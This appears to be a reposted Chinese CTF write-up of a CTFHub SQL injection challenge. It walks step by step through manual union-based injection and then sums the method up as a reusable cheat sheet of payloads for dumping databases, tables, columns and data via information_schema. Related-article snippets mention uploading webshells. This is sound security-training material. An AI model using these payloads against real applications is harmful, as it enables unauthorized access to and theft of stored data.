CTFHub | MySQL结构

这篇具有很好参考价值的文章主要介绍了CTFHub | MySQL结构。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

MySQL结构:

        (无)

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全
网页显示内容

        

        

0x02 解题过程

        根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。此题与前一题类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在 lvlbiqemvj 表中的数据发现此题 flag 。

        

根据题目描述输入1测试,发现数据ctfhub

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

        

使用'and 1 = 1'进行测试,判断是否存在sql注入

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

and 1 = 1

        

使用’and 1 = 2'进行测试,回显错误,说明存在sql注入

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

and 1 = 2

        

使用order by 判断字段数量,从order by 1开始

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

order by 1

        

判断字段2,使用order by 2

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

order by 2

        

判断字段3,使用order by 3,这里无回显,那么字段数量为2列

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

order by 3

        

知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,2

        

判断数据可能不存在数据库中,在id=1中加入负号可以查看到不存在数据库中的数据

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

id=-1 union select 1,2

        

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,version()

        

修改2为database(),查看数据库名,发现数据库版本为sqlictfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,database()

        

ⅩⅠ查看全部数据库名

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,group_concat(schema_name)from information_schema.schemata

        

ⅩⅡ发现sqli库名不是数据库自带的,最后在sqli数据库中发现lvlbiqemvj和news两个表名

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

        

ⅩⅢ先查看lvlbiqemvj表中的全部字段名,发现一个数据名为onwodzqnwq

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='lvlbiqemvj'

        

ⅩⅣ查看数据onwodzqnwq中的内容,发现此题flag

ctfhub mysql结构,CTF精进之路,安全,CTF,web安全

union select 1,group_concat(onwodzqnwq) from sqli.lvlbiqemvj

        

        

0x03 SQL手注流程

        因为关于 SQL 注入判断方法过多,那么只对此题目的注入流程做一个总结。

        

1.判断是否存在注入

and 1 = 1
and 1 = 2
or 1 = 1
or 1 = 2
?id=1' and 1' = 1'
?id=1' and 1' = 2'

2.判断字段数量,直到无回显异常为止

order by 1    #正常
order by 2    #正常
order by 3    #异常

3.查询注入点

?id=1 union select 1,2    #8为异常无回显
?id=-1 union select 1,2    #如果数据不存在数据库中,可以使用负号查找
?id=0 union select 1,2    #如果数据不存在数据库中,也可以使用零查找

4.查询数据库版本

union select 1,version()    '''替换2为 version()
                               查询sql数据库版本'''

5.查询数据库名

union select 1,database()    '''替换为 database()
                                查询数据库名'''

6.爆库

#数据库自带的表information_schema,其中包含所有的数据库信息
#schema_name 数据库名称
union select 1,group_concat(schema_name)from information_schema.schemata

7.查询表名

#table_name 表格名称
union select 1,group_concat(table_name) from information_schema.tables where table_schema='表名'

8.爆字段

#column_name 字段名称
union select 1,group_concat(column_name) from information_schema.columns where table_schema='库名' and table_name='表名'

10.爆数据

union select 1,group_concat(数据名) from 库名.表名

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。文章来源地址https://www.toymoban.com/news/detail-685098.html

到了这里,关于CTFHub | MySQL结构的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CTFhub-phpinfo

    ctrl+F搜索…

    2024年01月18日
    浏览(31)
  • CTFhub-文件上传-前端验证

    burp 抓包 -- 重发-- 查看源代码  用 GodZilla 生成木马 文件名为 1.php.jsp 上传--抓包--改包 (删掉 .jpg) -- 点击 放行  木马文件位置为:http://challenge-f0531d0c27641130.sandbox.ctfhub.com:10800/upload/1.php  用 蚁剑连接   ctfhub{4743b8a58fc2105c931ad6b8}

    2024年02月10日
    浏览(26)
  • CTFHUB-文件上传

    目录 一.使用工具 二.实操 1.无验证 2.JS前端验证 代码绕过 浏览器设置绕过 bp更改数据 3..htaccess 4.MIME绕过 尝试上传jpg文件 尝试更改MIME类型 5.00截断 6.双写绕过 中国蚁剑 kali bp 打开环境  文件上传 并且提示我们是无限制的 于是我们了解到i我们可以运用一句话木马 进行漏洞上

    2024年02月04日
    浏览(25)
  • RCE复习(ctfhub上)

            在Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理,若应用对用户的输入过滤不严,容易产生远程代码执行漏洞或系统命令执行漏洞。 二、常见RCE漏洞函数 1.系统命令执行函数 system():能将字符串作为OS命令执行,且返回命

    2024年04月29日
    浏览(27)
  • CTFhub-文件上传-无验证

    怎样判断一个网站是 php asp jsp 网站      首先,上传用哥斯拉生成 .php 文件 然后,用蚁剑测试连接 找到 flag_1043521020.php 文件,进去,即可发现 flag ctfhub{ee09842c786c113fb76c5542}

    2024年02月10日
    浏览(36)
  • CTFHUB-网站源码

    题源:CTFHub​​​​​​ 当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。 本题可用四种方法:dirsearch,python,burpsuite,御剑。 方法一:dirsearch python3 dirsearch 暴力扫描网页结构(包括网页中的目录和文件) 下载

    2023年04月16日
    浏览(61)
  • CTFHUB技能树——web篇

    因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。 HTTP协议 请求方式 用bp抓包把请求头改为

    2024年02月02日
    浏览(30)
  • CTFhub-bak文件

    看到提示说和index.php有关,在url后面加index.php.bak,跳转到http://challenge-7a4da2076cfabae6.sandbox.ctfhub.com:10800/index.php.bak网址,即: 跳转到下载页面,下载内容为: 这就是我们需要的flag!

    2024年01月22日
    浏览(19)
  • SSRF详解 基于CTFHub(上篇)

         本文将针对SSRF(服务端请求伪造)进行简要的讲解。通过CTFHub上的例题,让读者了解SSRF的基本原理、利用方式、绕过方式等。CTFHub的地址为:CTFHub 目录 SSRF简介 第一题 内网访问 第二题 伪协议读取文件 第三题 端口扫描 第四题 POST请求  第五题 上传文件 结语 很多

    2024年02月05日
    浏览(30)
  • CTFHub-Web-文件上传

    目录 知识点 一、无验证 二、前端验证 三、.htaccess 1、题目简介 2、解题思路 3、解题:上传htaccess文件==》上传符合我们重新后规则的文件==》蚁剑连接 四、MIME绕过 1、知识点 2、解题思路  五、文件头检查 六、00截断 1、知识点:PHP 5.2 00截断上传的原理 2、题目简介 3、解题

    2024年02月14日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包